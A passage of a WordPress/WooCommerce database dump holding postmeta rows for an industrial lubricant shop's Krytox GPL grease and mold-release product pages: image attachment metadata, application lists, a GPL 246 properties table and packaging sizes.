INSERT INTO `wp_postmeta` VALUES (12468, 1082, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/08/krytox-gpl-oil-grease2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-gpl-oil-grease2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12469, 1083, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12470, 1083, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4333;s:6:"height";i:3648;s:4:"file";s:34:"2016/08/krytox-gpl-oil-grease3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-800x674.jpg";s:5:"width";i:800;s:6:"height";i:674;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-768x647.jpg";s:5:"width";i:768;s:6:"height";i:647;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-gpl-oil-grease3-1600x1347.jpg";s:5:"width";i:1600;s:6:"height";i:1347;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12471, 1084, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12472, 1084, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/08/krytox-gpl-oil-grease4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-gpl-oil-grease4-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12473, 1085, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease5.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12474, 1085, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4496;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/krytox-gpl-oil-grease5.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-gpl-oil-grease5-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease5-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12475, 421, '_thumbnail_id', '1080'); 
INSERT INTO `wp_postmeta` VALUES (12476, 421, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12477, 421, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12478, 436, '_thumbnail_id', '1081'); 
INSERT INTO `wp_postmeta` VALUES (12479, 436, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12480, 436, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12481, 437, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12482, 437, '_thumbnail_id', '1082'); 
INSERT INTO `wp_postmeta` VALUES (12483, 437, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12484, 437, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12485, 438, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12486, 438, '_thumbnail_id', '1083'); 
INSERT INTO `wp_postmeta` VALUES (12487, 438, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12488, 438, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12489, 439, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12490, 439, '_thumbnail_id', '1084'); 
INSERT INTO `wp_postmeta` VALUES (12491, 439, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12492, 439, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12493, 440, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12494, 440, '_thumbnail_id', '1085'); 
INSERT INTO `wp_postmeta` VALUES (12495, 440, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12496, 440, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12497, 1086, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease-pfpe.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12498, 1086, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:38:"2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-gpl-oil-grease-pfpe-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"krytox-gpl-oil-grease-pfpe-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12499, 1087, '_wp_attached_file', '2016/08/krytox-pfpe-oil-grease-gpl.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12500, 1087, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4448;s:6:"height";i:3056;s:4:"file";s:38:"2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-800x550.jpg";s:5:"width";i:800;s:6:"height";i:550;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-768x528.jpg";s:5:"width";i:768;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-pfpe-oil-grease-gpl-1600x1099.jpg";s:5:"width";i:1600;s:6:"height";i:1099;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"krytox-pfpe-oil-grease-gpl-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12501, 441, '_thumbnail_id', '1086'); 
INSERT INTO `wp_postmeta` VALUES (12502, 441, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12503, 441, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12504, 442, '_thumbnail_id', '1087'); 
INSERT INTO `wp_postmeta` VALUES (12505, 442, '716_default_editor', '<ul>\r\n 	<li>O-Rings</li>\r\n 	<li>Fill Fluid</li>\r\n 	<li>Injection Molding</li>\r\n 	<li>Slip-Ring</li>\r\n 	<li>Mandrels</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12506, 442, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12507, 1088, '_edit_lock', '1475594047:2'); 
INSERT INTO `wp_postmeta` VALUES (12508, 1088, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12509, 769, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12510, 1089, '_wp_attached_file', '2016/08/krytox-gpl-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12511, 1089, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:3337;s:4:"file";s:29:"2016/08/krytox-gpl-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-gpl-grease-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-gpl-grease-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-gpl-grease-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-gpl-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-gpl-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12512, 1088, '_thumbnail_id', '1089'); 
INSERT INTO `wp_postmeta` VALUES (12513, 1088, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12514, 1088, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12515, 1088, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="202"><strong>Typical Properties</strong></td>\r\n<td style="text-align: center;" width="224"><strong>GPL 246</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range</strong></td>\r\n<td style="text-align: center;">-36 to 260°C</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Consistency</strong></td>\r\n<td style="text-align: center;">NLGI Grade 2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity</strong></td>\r\n<td style="text-align: center;">810 cSt at 20°C</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">240 cSt at 40°C</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">25 cSt at 100°C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12516, 1088, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12517, 1088, '719_default_editor', '<ul>\r\n 	<li>ASTM D257</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12518, 1088, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12519, 1088, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12520, 1088, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12521, 1088, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12522, 1088, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12523, 1088, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12524, 1088, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12525, 1088, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12526, 1088, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12527, 1088, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12528, 1088, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12529, 1088, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12530, 1088, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12531, 1088, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12532, 1088, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12533, 1088, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12534, 1088, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12535, 1088, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12536, 1088, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12537, 1088, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12538, 1088, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12539, 1088, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12540, 1088, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12541, 1088, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12542, 1088, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12543, 1088, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12544, 1088, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12545, 1088, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12546, 1088, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12547, 1088, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (12548, 1090, '_wp_attached_file', '2016/08/ReleaSys-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12549, 1090, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4004;s:4:"file";s:48:"2016/08/ReleaSys-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:50:"ReleaSys-semi-permanent-mold-release-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:48:"ReleaSys-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}